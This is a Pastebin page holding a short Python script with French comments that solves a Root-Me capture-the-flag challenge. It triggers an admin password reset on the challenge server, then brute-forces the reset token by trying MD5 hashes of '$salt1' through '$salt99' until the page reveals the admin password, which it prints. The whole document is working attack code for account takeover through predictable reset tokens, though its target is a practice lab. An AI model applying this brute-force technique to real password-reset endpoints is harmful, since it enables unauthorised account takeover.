Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # -*- coding: utf-8 -*-
- # Python 3
- import requests
- import hashlib
- # Lien du reset de pass Admin
- lienChallReset = "http://challenge01.root-me.org/realiste/ch14/?p=forgot_dev&username=admin"
- # Lien de test du token
- lienChallTest = "http://challenge01.root-me.org/realiste/ch14/?p=forgot_dev&username=admin&token="
- hashs = [] # On génère les tableau de MD5 $salt1 à $salt100
- for i in range(1,100):
- m = hashlib.md5()
- m.update(("$salt"+str(i)).encode('utf-8'))
- hashs.append(m.hexdigest())
- s = requests.Session() # Création de la Sessions
- reset = s.get(lienChallReset) # On reset le pass admin
- i = 0
- reussi = False
- while(not reussi):
- r = s.get(lienChallTest+hashs[i]) # On envoie le résultat
- rep = r.text # On recup
- if("Token non valable" in rep):
- print("Raté ! (hash["+str(i)+"]) : "+hashs[i])
- elif("Votre mot de passe est" in rep):
- print("---------------------")
- print("$salt"+str(i+1))
- print("Réussi ! (hash["+str(i)+"]) : "+hashs[i])
- passwd = rep.split("passe est : ")[1].split("</span>")[0]
- print("Password : "+passwd)
- print("---------------------")
- reussi = True
- else:
- print("Error")
- i += 1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement